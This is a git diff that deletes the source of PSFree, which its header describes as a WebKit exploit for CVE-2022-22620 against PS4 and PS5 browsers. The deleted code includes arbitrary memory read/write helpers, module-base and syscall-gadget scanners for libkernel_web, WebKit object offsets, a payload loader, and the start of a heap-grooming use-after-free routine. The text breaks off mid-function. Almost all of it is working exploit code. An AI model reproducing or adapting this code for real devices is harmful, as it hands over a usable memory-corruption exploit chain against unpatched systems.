-    write64_at(offset, value) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        const values = lohi_from_one(value);
-        const worker = this._worker;
-        worker.setUint32(offset, values[0], true);
-        worker.setUint32(offset + 4, values[1], true);
-    }
-}
diff --git a/psfree/module/memtools.mjs b/psfree/module/memtools.mjs
deleted file mode 100644
index ed8ec2e..0000000
--- a/psfree/module/memtools.mjs
+++ /dev/null
@@ -1,255 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// This module are for utilities that depend on running the exploit first
-
-import { Int } from './int64.mjs';
-import { mem } from './mem.mjs';
-import { align } from './utils.mjs';
-import { page_size } from './offset.mjs';
-import { BufferView } from './rw.mjs';
-import { View1 } from './view.mjs';
-import * as off from './offset.mjs';
-
-// creates an ArrayBuffer whose contents is copied from addr
-export function make_buffer(addr, size) {
-    // see enum TypedArrayMode from
-    // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h
-    // at webkitgtk 2.34.4
-    //
-    // see possiblySharedBuffer() from
-    // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
-    // at webkitgtk 2.34.4
-
-    // We will create an OversizeTypedArray via requesting an Uint8Array whose
-    // number of elements will be greater than fastSizeLimit (1000).
-    //
-    // We will not use a FastTypedArray since its m_vector is visited by the
-    // GC and we will temporarily change it. The GC expects addresses from the
-    // JS heap, and that heap has metadata that the GC uses. The GC will likely
-    // crash since valid metadata won't likely be found at arbitrary addresses.
-    //
-    // The FastTypedArray approach will have a small time frame where the GC
-    // can inspect the invalid m_vector field.
-    //
-    // Views created via "new TypedArray(x)" where "x" is a number will always
-    // have an m_mode < WastefulTypedArray.
-    const u = new Uint8Array(1001);
-    const u_addr = mem.addrof(u);
-
-    // we won't change the butterfly and m_mode so we won't save those
-    const old_addr = u_addr.read64(off.view_m_vector);
-    const old_size = u_addr.read32(off.view_m_length);
-
-    u_addr.write64(off.view_m_vector, addr);
-    u_addr.write32(off.view_m_length, size);
-
-    const copy = new Uint8Array(u.length);
-    copy.set(u);
-
-    // Views with m_mode < WastefulTypedArray don't have an ArrayBuffer object
-    // associated with them, if we ask for view.buffer, the view will be
-    // converted into a WastefulTypedArray and an ArrayBuffer will be created.
-    // This is done by calling slowDownAndWasteMemory().
-    //
-    // We can't use slowDownAndWasteMemory() on u since that will create a
-    // JSC::ArrayBufferContents with its m_data pointing to addr. On the
-    // ArrayBuffer's death, it will call WTF::fastFree() on m_data. This can
-    // cause a crash if the m_data is not from the fastMalloc heap, and even if
-    // it is, freeing abitrary addresses is dangerous as it may lead to a
-    // use-after-free.
-    const res = copy.buffer;
-
-    // restore
-    u_addr.write64(off.view_m_vector, old_addr);
-    u_addr.write32(off.view_m_length, old_size);
-
-    return res;
-}
-
-// these values came from analyzing dumps from CelesteBlue
-function check_magic_at(p, is_text) {
-    // byte sequence that is very likely to appear at offset 0 of a .text
-    // segment
-    const text_magic = [
-        new Int(0xe5894855, 0x56415741),
-        new Int(0x54415541, 0x8d485053),
-    ];
-
-    // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
-
-    // .data magic from 3.00, 6.00, and 6.20
-    //const data_magic = [
-    //    new Int(0x18),
-    //    new Int(0x3c13f4bf, 0x1),
-    //];
-
-    // .data magic from 8.00 and 8.03
-    const data_magic = [
-        new Int(0x20),
-        new Int(0x3c13f4bf, 0x2),
-    ];
-
-    const magic = is_text ? text_magic : data_magic;
-    const value = [p.read64(0), p.read64(8)];
-
-    return value[0].eq(magic[0]) && value[1].eq(magic[1]);
-}
-
-// Finds the base address of a segment: .text or .data
-// Used on the ps4 to locate module base addresses
-// * p:
-//     an address pointing somewhere in the segment to search
-// * is_text:
-//     whether the segment is .text or .data
-// * is_back:
-//     whether to search backwards (to lower addresses) or forwards
-//
-// Modules are likely to be separated by a couple of unmapped pages because of
-// Address Space Layout Randomization (all module base addresses are
-// randomized). This means that this function will either succeed or crash on
-// a page fault, if the magic is not present.
-//
-// To be precise, modules are likely to be "surrounded" by unmapped pages, it
-// does not mean that the distance between a boundary of a module and the
-// nearest unmapped page is 0.
-//
-// The boundaries of a module is its base and end addresses.
-//
-// let module_base_addr = find_base(...);
-// // Not guaranteed to crash, the nearest unmapped page is not necessarily at
-// // 0 distance away from module_base_addr.
-// addr.read8(-1);
-//
-export function find_base(addr, is_text, is_back) {
-    // align to page size
-    addr = align(addr, page_size);
-    const offset = (is_back ? -1 : 1) * page_size;
-    while (true) {
-        if (check_magic_at(addr, is_text)) {
-            break;
-        }
-        addr = addr.add(offset);
-    }
-    return addr;
-}
-
-// gets the address of the underlying buffer of a JSC::JSArrayBufferView
-export function get_view_vector(view) {
-    if (!ArrayBuffer.isView(view)) {
-        throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
-    }
-    return mem.addrof(view).readp(off.view_m_vector);
-}
-
-export function resolve_import(import_addr) {
-    if (import_addr.read16(0) !== 0x25ff) {
-        throw Error(
-            `instruction at ${import_addr} is not of the form: jmp qword`
-            + ' [rip + X]');
-    }
-    // module_function_import:
-    //     jmp qword [rip + X]
-    //     ff 25 xx xx xx xx // signed 32-bit displacement
-    const disp = import_addr.read32(2);
-    // assume disp and offset are 32-bit integers
-    // x | 0 will always be a signed integer
-    const offset = (disp | 0) + 6;
-    // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
-    // of the next instruction. This means that the actual address used is
-    // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
-    // jump instruction, which is 6 in this case.
-    const function_addr = import_addr.readp(offset);
-
-    return function_addr;
-}
-
-export function init_syscall_array(
-    syscall_array,
-    libkernel_web_base,
-    max_search_size,
-) {
-    if (!Number.isInteger(max_search_size)) {
-        throw TypeError(
-            `max_search_size is not a integer: ${max_search_size}`);
-    }
-    if (max_search_size < 0) {
-        throw Error(`max_search_size is less than 0: ${max_search_size}`);
-    }
-
-    const libkernel_web_buffer = make_buffer(
-        libkernel_web_base,
-        max_search_size,
-    );
-    const kbuf = new BufferView(libkernel_web_buffer);
-
-    // Search 'rdlo' string from libkernel_web's .rodata section to gain an
-    // upper bound on the size of the .text section.
-    let text_size = 0;
-    let found = false;
-    for (let i = 0; i < max_search_size; i++) {
-        if (kbuf[i] === 0x72
-            && kbuf[i + 1] === 0x64
-            && kbuf[i + 2] === 0x6c
-            && kbuf[i + 3] === 0x6f
-        ) {
-            text_size = i;
-            found = true;
-            break;
-        }
-    }
-    if (!found) {
-        throw Error(
-            '"rdlo" string not found in libkernel_web, base address:'
-            + ` ${libkernel_web_base}`);
-    }
-
-    // search for the instruction sequence:
-    // syscall_X:
-    //     mov rax, X
-    //     mov r10, rcx
-    //     syscall
-    for (let i = 0; i < text_size; i++) {
-        if (kbuf[i] === 0x48
-            && kbuf[i + 1] === 0xc7
-            && kbuf[i + 2] === 0xc0
-            && kbuf[i + 7] === 0x49
-            && kbuf[i + 8] === 0x89
-            && kbuf[i + 9] === 0xca
-            && kbuf[i + 10] === 0x0f
-            && kbuf[i + 11] === 0x05
-        ) {
-            const syscall_num = kbuf.read32(i + 3);
-            syscall_array[syscall_num] = libkernel_web_base.add(i);
-            // skip the sequence
-            i += 11;
-        }
-    }
-}
-
-// create a char array like in the C language
-//
-// string to view since it's easier to get the address of the buffer this way
-export function cstr(str) {
-    str += '\0';
-    return View1.from(str, c => c.codePointAt(0));
-}
-
-// we are re-exporting this since users that want to use cstr() usually want
-// jstr() as well. they are likely working with functions that take/return
-// strings
-export { jstr } from './utils.mjs';
diff --git a/psfree/module/offset.mjs b/psfree/module/offset.mjs
deleted file mode 100644
index 74c9dc0..0000000
--- a/psfree/module/offset.mjs
+++ /dev/null
@@ -1,62 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// WebKit offsets start
-
-// offsets for JSC::JSObject
-export const js_cell = 0;
-export const js_butterfly = 0x8;
-// start of the array of inline properties (JSValues)
-export const js_inline_prop = 0x10;
-
-// sizeof JSC::JSObject
-export const size_jsobj = js_inline_prop;
-
-// offsets for JSC::JSArrayBufferView
-export const view_m_vector = 0x10;
-export const view_m_length = 0x18;
-export const view_m_mode = 0x1c;
-
-// sizeof JSC::JSArrayBufferView
-export const size_view = 0x20;
-
-// offsets for WTF::StringImpl
-export const strimpl_strlen = 4;
-export const strimpl_m_data = 8;
-export const strimpl_inline_str = 0x14;
-
-// sizeof WTF::StringImpl
-export const size_strimpl = 0x18;
-
-// offsets for WebCore::JSHTMLTextAreaElement, subclass of JSObject
-
-// offset to m_wrapped, pointer to a DOM object
-// for this class, it's a WebCore::HTMLTextAreaElement pointer
-export const jsta_impl = 0x18;
-
-// sizeof WebCore::JSHTMLTextAreaElement
-export const size_jsta = 0x20;
-
-// WebKit offsets end
-
-export const KB = 1024;
-export const MB = KB * KB;
-export const GB = KB * KB * KB;
-export const page_size = 16 * KB; // page size on the ps4
-
-// size of the buffer used by setcontext/getcontext (see module/chain.mjs)
-export const context_size = 0xc8;
diff --git a/psfree/module/rw.mjs b/psfree/module/rw.mjs
deleted file mode 100644
index 2075817..0000000
--- a/psfree/module/rw.mjs
+++ /dev/null
@@ -1,140 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-import { Int, lohi_from_one } from './int64.mjs';
-
-// DataView's accessors are constant time and are faster when doing multi-byte
-// accesses but the single-byte accessors are slightly slower compared to just
-// indexing the Uint8Array
-//
-// to get the best of both worlds, BufferView uses a DataView for multi-byte
-// accesses and a Uint8Array for single-byte
-//
-// instances of BufferView will their have m_mode set to WastefulTypedArray
-// since we use the .buffer getter to create a DataView
-export class BufferView extends Uint8Array {
-    constructor(...args) {
-        super(...args);
-        this._dview = new DataView(this.buffer, this.byteOffset);
-    }
-
-    read16(offset) {
-        return this._dview.getUint16(offset, true);
-    }
-
-    read32(offset) {
-        return this._dview.getUint32(offset, true);
-    }
-
-    read64(offset) {
-        return new Int(
-            this._dview.getUint32(offset, true),
-            this._dview.getUint32(offset + 4, true),
-        );
-    }
-
-    write16(offset, value) {
-        this._dview.setUint16(offset, value, true);
-    }
-
-    write32(offset, value) {
-        this._dview.setUint32(offset, value, true);
-    }
-
-    write64(offset, value) {
-        const values = lohi_from_one(value);
-        this._dview.setUint32(offset, values[0], true);
-        this._dview.setUint32(offset + 4, values[1], true);
-    }
-}
-
-// WARNING: These functions are now deprecated. use BufferView instead.
-
-// view.buffer is the underlying ArrayBuffer of a TypedArray, but since we will
-// be corrupting the m_vector of our target views later, the ArrayBuffer's
-// buffer will not correspond to our fake m_vector anyway.
-//
-// can't use:
-//
-// function read32(u8_view, offset) {
-//     let res = new Uint32Array(u8_view.buffer, offset, 1);
-//     return res[0];
-// }
-//
-// to implement read32, we need to index the view instead:
-//
-// function read32(u8_view, offset) {
-//     let res = 0;
-//     for (let i = 0; i < 4; i++) {
-//         res += u8_view[offset + i] << i*8;
-//     }
-//     // << returns a signed integer, >>> converts it to unsigned
-//     return res >>> 0;
-// }
-
-// for reads less than 8 bytes
-function read(u8_view, offset, size) {
-    let res = 0;
-    for (let i = 0; i < size; i++) {
-        res += u8_view[offset + i] << i*8;
-    }
-    // << returns a signed integer, >>> converts it to unsigned
-    return res >>> 0;
-}
-
-export function read16(u8_view, offset) {
-    return read(u8_view, offset, 2);
-}
-
-export function read32(u8_view, offset) {
-    return read(u8_view, offset, 4);
-}
-
-export function read64(u8_view, offset) {
-    return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
-}
-
-// for writes less than 8 bytes
-function write(u8_view, offset, value, size) {
-    for (let i = 0; i < size; i++) {
-        u8_view[offset + i]  = (value >>> i*8) & 0xff;
-    }
-}
-
-export function write16(u8_view, offset, value) {
-    write(u8_view, offset, value, 2);
-}
-
-export function write32(u8_view, offset, value) {
-    write(u8_view, offset, value, 4);
-}
-
-export function write64(u8_view, offset, value) {
-    if (!(value instanceof Int)) {
-        throw TypeError('write64 value must be an Int');
-    }
-
-    let low = value.lo;
-    let high = value.hi;
-
-    for (let i = 0; i < 4; i++) {
-        u8_view[offset + i]  = (low >>> i*8) & 0xff;
-    }
-    for (let i = 0; i < 4; i++) {
-        u8_view[offset + 4 + i]  = (high >>> i*8) & 0xff;
-    }
-}
diff --git a/psfree/module/utils.mjs b/psfree/module/utils.mjs
deleted file mode 100644
index 7c20ef1..0000000
--- a/psfree/module/utils.mjs
+++ /dev/null
@@ -1,172 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-import { Int } from './int64.mjs';
-
-export class DieError extends Error {
-    constructor(...args) {
-        super(...args);
-        this.name = this.constructor.name;
-    }
-}
-
-export function die(msg='') {
-    throw new DieError(msg);
-}
-
-const console = document.getElementById('console');
-export function log(msg='') {
-    console.append(msg + '\n');
-}
-
-export function clear_log() {
-    console.innerHTML = null;
-}
-
-// alignment must be 32 bits and is a power of 2
-export function align(a, alignment) {
-    if (!(a instanceof Int)) {
-        a = new Int(a);
-    }
-    const mask = -alignment & 0xffffffff;
-    let type = a.constructor;
-    let low = a.lo & mask;
-    return new type(low, a.hi);
-}
-
-export async function send(url, buffer, file_name, onload=() => {}) {
-    const file = new File(
-        [buffer],
-        file_name,
-        {type:'application/octet-stream'}
-    );
-    const form = new FormData();
-    form.append('upload', file);
-
-    log('send');
-    const response = await fetch(url, {method: 'POST', body: form});
-
-    if (!response.ok) {
-        throw Error(`Network response was not OK, status: ${response.status}`);
-    }
-    onload();
-}
-
-// mostly used to yield to the GC. marking is concurrent but collection isn't
-//
-// yielding also lets the DOM update. which is useful since we use the DOM for
-// logging and we loop when waiting for a collection to occur
-export function sleep(ms=0) {
-    return new Promise(resolve => setTimeout(resolve, ms));
-}
-
-export function hex(number) {
-    return '0x' + number.toString(16);
-}
-
-// no "0x" prefix
-export function hex_np(number) {
-    return number.toString(16);
-}
-
-// expects a byte array
-export function hexdump(view) {
-    const num_16 = view.length & ~15;
-    const residue = view.length - num_16;
-    const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
-
-    function chr(i) {
-        if (0x20 <= i && i <= 0x7e) {
-            return String.fromCodePoint(i);
-        }
-        return '.';
-    }
-
-    function to_hex(view, offset, length) {
-        return (
-            [...view.slice(offset, offset + length)]
-            .map(e => hex_np(e).padStart(2, '0'))
-            .join(' ')
-        );
-    }
-
-    let bytes = [];
-    for (let i = 0; i < num_16; i += 16) {
-        const long1 = to_hex(view, i, 8);
-        const long2 = to_hex(view, i + 8, 8);
-
-        let print = '';
-        for (let j = 0; j < 16; j++) {
-            print += chr(view[j]);
-        }
-
-        bytes.push([`${long1}  ${long2}`, print]);
-    }
-
-    if (residue) {
-        const small = residue <= 8;
-        const long1_len = small ? residue : 8;
-
-        let long1 = to_hex(view, num_16, long1_len);
-        if (small) {
-            for (let i = 0; i < 8 - residue; i++) {
-                long1 += ' xx';
-            }
-        }
-
-        const long2 = (() => {
-            if (small) {
-                return Array(8).fill('xx').join(' ');
-            }
-
-            let res = to_hex(view, num_16 + 8, residue - 8);
-            for (let i = 0; i < 16 - residue; i++) {
-                res += ' xx';
-            }
-
-            return res;
-        })();
-
-        let print = '';
-        for (let i = 0; i < residue; i++) {
-            print += chr(view[num_16 + i]);
-        }
-        for (let i = 0; i < 16 - residue; i++) {
-            print += ' ';
-        }
-
-        bytes.push([`${long1}  ${long2}`, print]);
-    }
-
-    for (const [pos, [val, print]] of bytes.entries()) {
-        const off = hex_np(pos * 16).padStart(max_off_len, '0');
-        log(`${off} | ${val} |${print}|`);
-    }
-}
-
-// make a JavaScript string
-export function jstr(buffer) {
-    let res = '';
-    for (const item of buffer) {
-        if (item === 0) {
-            break;
-        }
-        res += String.fromCodePoint(item);
-    }
-    // convert to primitive string
-    return String(res);
-}
diff --git a/psfree/module/view.mjs b/psfree/module/view.mjs
deleted file mode 100644
index 35b99c4..0000000
--- a/psfree/module/view.mjs
+++ /dev/null
@@ -1,261 +0,0 @@
-/* Copyright (C) 2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-import { Int, lohi_from_one } from './int64.mjs';
-import { Addr } from './mem.mjs';
-import { BufferView } from './rw.mjs';
-
-import * as config from '../config.mjs';
-import * as mt from './memtools.mjs';
-
-// View constructors will always get the buffer property in order to make sure
-// that the JSArrayBufferView is a WastefulTypedArray. m_vector may change if
-// m_mode < WastefulTypedArray. This is to make caching the m_view field
-// possible. Users don't have to worry if the m_view they got from addr() is
-// possibly stale.
-//
-// see possiblySharedBuffer() from
-// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
-// at PS4 8.03
-//
-// Subclasses of TypedArray are still implemented as a JSArrayBufferView, so
-// get_view_vector() still works on them.
-
-function ViewMixin(superclass) {
-    const res = class extends superclass {
-        constructor(...args) {
-            super(...args);
-            this.buffer;
-        }
-
-        get addr() {
-            let res = this._addr_cache;
-            if (res !== undefined) {
-                return res;
-            }
-            res = mt.get_view_vector(this);
-            this._addr_cache = res;
-            return res;
-        }
-
-        get size() {
-            return this.byteLength;
-        }
-
-        addr_at(index) {
-            const size = this.BYTES_PER_ELEMENT;
-            return this.addr.add(index * size);
-        }
-
-        sget(index) {
-            return this[index] | 0;
-        }
-    };
-
-    // workaround for known affected versions: ps4 [6.00, 10.00)
-    //
-    // see from() and of() from
-    // WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
-    // 8.0x
-    //
-    // @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
-    // isn't one of the built-in TypedArrays. this is a violation of the
-    // ECMAScript spec at that time
-    //
-    // TODO assumes ps4, support ps5 as well
-    // FIXME define the from/of workaround functions once
-    if (0x600 <= config.target && config.target < 0x1000) {
-        res.from = function from(...args) {
-            const base = this.__proto__;
-            return new this(base.from(...args).buffer);
-        };
-
-        res.of = function of(...args) {
-            const base = this.__proto__;
-            return new this(base.of(...args).buffer);
-        };
-    }
-
-    return res;
-}
-
-export class View1 extends ViewMixin(Uint8Array) {}
-export class View2 extends ViewMixin(Uint16Array) {}
-export class View4 extends ViewMixin(Uint32Array) {}
-
-export class Buffer extends BufferView {
-    get addr() {
-        let res = this._addr_cache;
-        if (res !== undefined) {
-            return res;
-        }
-        res = mt.get_view_vector(this);
-        this._addr_cache = res;
-        return res;
-    }
-
-    get size() {
-        return this.byteLength;
-    }
-
-    addr_at(index) {
-        return this.addr.add(index);
-    }
-}
-// see from() and of() comment above
-if (0x600 <= config.target && config.target < 0x1000) {
-    Buffer.from = function from(...args) {
-        const base = this.__proto__;
-        return new this(base.from(...args).buffer);
-    };
-    Buffer.of = function of(...args) {
-        const base = this.__proto__;
-        return new this(base.of(...args).buffer);
-    };
-}
-
-const VariableMixin = superclass => class extends superclass {
-    constructor(value=0) {
-        // unlike the View classes, we don't allow number coercion. we
-        // explicitly allow floats unlike Int
-        if (typeof value !== 'number') {
-            throw TypeError('value not a number');
-        }
-        super([value]);
-    }
-
-    addr_at(...args) {
-        throw TypeError('unimplemented method');
-    }
-
-    [Symbol.toPrimitive](hint) {
-        return this[0];
-    }
-
-    toString(...args) {
-        return this[0].toString(...args);
-    }
-};
-
-export class Byte extends VariableMixin(View1) {}
-export class Short extends VariableMixin(View2) {}
-// Int was already taken by int64.mjs
-export class Word extends VariableMixin(View4) {}
-
-export class LongArray {
-    constructor(length) {
-        this.buffer = new DataView(new ArrayBuffer(length * 8));
-    }
-
-    get addr() {
-        return mt.get_view_vector(this.buffer);
-    }
-
-    addr_at(index) {
-        return this.addr.add(index * 8);
-    }
-
-    get length() {
-        return this.buffer.length / 8;
-    }
-
-    get size() {
-        return this.buffer.byteLength;
-    }
-
-    get byteLength() {
-        return this.size;
-    }
-
-    get(index) {
-        const buffer = this.buffer;
-        const base = index * 8;
-        return new Int(
-            buffer.getUint32(base, true),
-            buffer.getUint32(base + 4, true),
-        );
-    }
-
-    set(index, value) {
-        const buffer = this.buffer;
-        const base = index * 8;
-        const values = lohi_from_one(value);
-
-        buffer.setUint32(base, values[0], true);
-        buffer.setUint32(base + 4, values[1], true);
-    }
-}
-
-// mutable Int (we are explicitly using Int's private fields)
-const Word64Mixin = superclass => class extends superclass {
-    constructor(...args) {
-        if (!args.length) {
-            return super(0);
-        }
-        super(...args);
-    }
-
-    get addr() {
-        // assume this is safe to cache
-        return mt.get_view_vector(this._u32);
-    }
-
-    get length() {
-        return 1;
-    }
-
-    get size() {
-        return 8;
-    }
-
-    get byteLength() {
-        return 8;
-    }
-
-    // no setters for top and bot since low/high can accept negative integers
-
-    get lo() {
-        return super.lo;
-    }
-
-    set lo(value) {
-        this._u32[0] = value;
-    }
-
-    get hi() {
-        return super.hi;
-    }
-
-    set hi(value) {
-        this._u32[1] = value;
-    }
-
-    set(value) {
-        const buffer = this._u32;
-        const values = lohi_from_one(value);
-
-        buffer[0] = values[0];
-        buffer[1] = values[1];
-    }
-};
-
-export class Long extends Word64Mixin(Int) {
-    as_addr() {
-        return new Addr(this);
-    }
-}
-export class Pointer extends Word64Mixin(Addr) {}
diff --git a/psfree/payload.bin b/psfree/payload.bin
deleted file mode 100644
index d5541fa..0000000
Binary files a/psfree/payload.bin and /dev/null differ
diff --git a/psfree/payload.js b/psfree/payload.js
deleted file mode 100644
index f64dfc2..0000000
--- a/psfree/payload.js
+++ /dev/null
@@ -1,6 +0,0 @@
-fetch('./payload.bin').then(res => {
-    res.arrayBuffer().then(arr => {
-        window.pld = new Uint32Array(arr);
-
-    })
-})
\ No newline at end of file
diff --git a/psfree/psfree.mjs b/psfree/psfree.mjs
deleted file mode 100644
index fb9b346..0000000
--- a/psfree/psfree.mjs
+++ /dev/null
@@ -1,862 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write
-//
-// vulnerable:
-// * PS4 [6.00, 10.00)
-// * PS5 [1.00, 6.00)
-//
-// * CelesteBlue from ps4-dev on discord.com
-//   * Helped in figuring out the size of WebCore::SerializedScriptValue and
-//     its needed offsets on different firmwares.
-//   * figured out the range of vulnerable firmwares
-// * janisslsm from ps4-dev on discord.com
-//   * Helped in figuring out the size of JSC::ArrayBufferContents and its
-//     needed offsets on different firmwares.
-// * Kameleon_ from ps4-dev on discord.com - tester
-// * SlidyBat from PS5 R&D discord.com
-//   * Helped in figuring out the size of JSC::ArrayBufferContents and its
-//     needed offsets on different firmwares (PS5).
-
-import { Int } from './module/int64.mjs';
-import { Memory,mem } from './module/mem.mjs';
-import { KB, MB } from './module/offset.mjs';
-import { BufferView } from './module/rw.mjs';
-
-import {
-    die,
-    DieError,
-    log,
-    clear_log,
-    sleep,
-    hex,
-    align,
-} from './module/utils.mjs';
-
-import * as config from './config.mjs';
-import * as off from './module/offset.mjs';
-
-// check if we are running on a supported firmware version
-const [is_ps4, version] = (() => {
-    const value = config.target;
-    const is_ps4 = (value & 0x10000) === 0;
-    const version = value & 0xffff;
-    const [lower, upper] = (() => {
-        if (is_ps4) {
-            return [0x600, 0x1000];
-        } else {
-            return [0x100, 0x600];
-        }
-    })();
-
-    if (!(lower <= version && version < upper)) {
-        throw RangeError(`invalid config.target: ${hex(value)}`);
-    }
-
-    return [is_ps4, version];
-})();
-
-const ssv_len = (() => {
-    if (0x600 <= config.target && config.target < 0x650) {
-        return 0x58;
-    }
-
-    // PS4 9.xx and all supported PS5 versions
-    if (config.target >= 0x900) {
-        return 0x50;
-    }
-
-    if (0x650 <= config.target && config.target < 0x900) {
-        return 0x48;
-    }
-})();
-
-// these constants are expected to be divisible by 2
-const num_fsets = 0x180;
-const num_spaces = 0x40;
-const num_adjs = 8;
-
-const num_reuses = 0x300;
-const num_strs = 0x200;
-const num_leaks = 0x100;
-
-// we can use the rows attribute of a frameset to allocate from fastMalloc
-//
-// see parseAttribute() from
-// WebKit/Source/WebCore/html/HTMLFrameSetElement.cpp at PS4 8.0x
-//
-// parseAttribute() will call newLengthArray():
-//
-// UniqueArray newLengthArray(const String& string, int& len)
-// {
-//     RefPtr str = string.impl()->simplifyWhiteSpace();
-//     ...
-//     len = countCharacter(*str, ',') + 1; [1]
-//     auto r = makeUniqueArray(len); [2]
-//     ...
-// }
-//
-// pseudocode definition:
-//
-// class UniqueArray:
-//     size_t _size; [3]
-//     Length _data[];
-//
-// [2] allocates from the fastMalloc heap. [1] will add an additional 1 to len.
-// [3] adds an extra 8 bytes to the array
-//
-// a Length is 8 bytes in size. if we want to allocate ssv_len bytes from
-// fastMalloc, then we need:
-//
-// const num_repeats = ssv_len / 8 - 2;
-// const rows = ','.repeat(num_repeats);
-const rows = ','.repeat(ssv_len / 8 - 2);
-
-const original_strlen = ssv_len - off.size_strimpl;
-const original_loc = location.pathname;
-
-function gc() {
-    new Uint8Array(4 * MB);
-}
-
-function sread64(str, offset) {
-    const low = (
-        str.charCodeAt(offset)
-        | str.charCodeAt(offset + 1) << 8
-        | str.charCodeAt(offset + 2) << 16
-        | str.charCodeAt(offset + 3) << 24
-    );
-    const high = (
-        str.charCodeAt(offset + 4)
-        | str.charCodeAt(offset + 5) << 8
-        | str.charCodeAt(offset + 6) << 16
-        | str.charCodeAt(offset + 7) << 24
-    );
-    return new Int(low, high);
-}
-
-function prepare_uaf() {
-    const fsets = [];
-    const indices = [];
-
-    function alloc_fs(fsets, size) {
-        for (let i = 0; i < size / 2; i++) {
-            const fset = document.createElement('frameset');
-            fset.rows = rows;
-            fset.cols = rows;
-            fsets.push(fset);
-        }
-    }
-
-    // the first call to either replaceState/pushState is likely to allocate a
-    // JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
-    // the SmallLine where the SSV resides from being freed. so we do a dummy
-    // call first
-    history.replaceState('state0', '');
-
-    alloc_fs(fsets, num_fsets);
-
-    // the "state1" SSVs is what we will UAF
-
-    history.pushState('state1', '', original_loc + '#bar');
-    indices.push(fsets.length);
-
-    alloc_fs(fsets, num_spaces);
-
-    history.pushState('state1', '', original_loc + '#foo');
-    indices.push(fsets.length);
-
-    alloc_fs(fsets, num_spaces);
-
-    history.pushState('state2', '');
-    return [fsets, indices];
-}
-
-// WebCore::SerializedScriptValue use-after-free
-//
-// be careful when accessing history.state since History::state() will get
-// called. History will cache the SSV at its m_lastStateObjectRequested if you
-// do. that field is a RefPtr, thus preventing a UAF if we cache "state1"
-async function uaf_ssv(fsets, index, index2) {
-    const views = [];
-    const input = document.createElement('input');
-    input.id = 'input';
-    const foo = document.createElement('input');
-    foo.id = 'foo';
-    const bar = document.createElement('a');
-    bar.id = 'bar';
-
-    log(`ssv_len: ${hex(ssv_len)}`);
-
-    let pop = null;
-    let pop2 = null;
-    let pop_promise2 = null;
-    let blurs = [0, 0];
-    let resolves = [];
-
-    function onpopstate(event) {
-        const no_pop = pop === null;
-        const idx = no_pop ? 0 : 1;
-
-        log(`pop ${idx} came`);
-        if (blurs[idx] === 0) {
-            const r = resolves[idx][1];
-            r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
-        }
-
-        if (no_pop) {
-            pop_promise2 = new Promise((resolve, reject) => {
-                resolves.push([resolve, reject]);
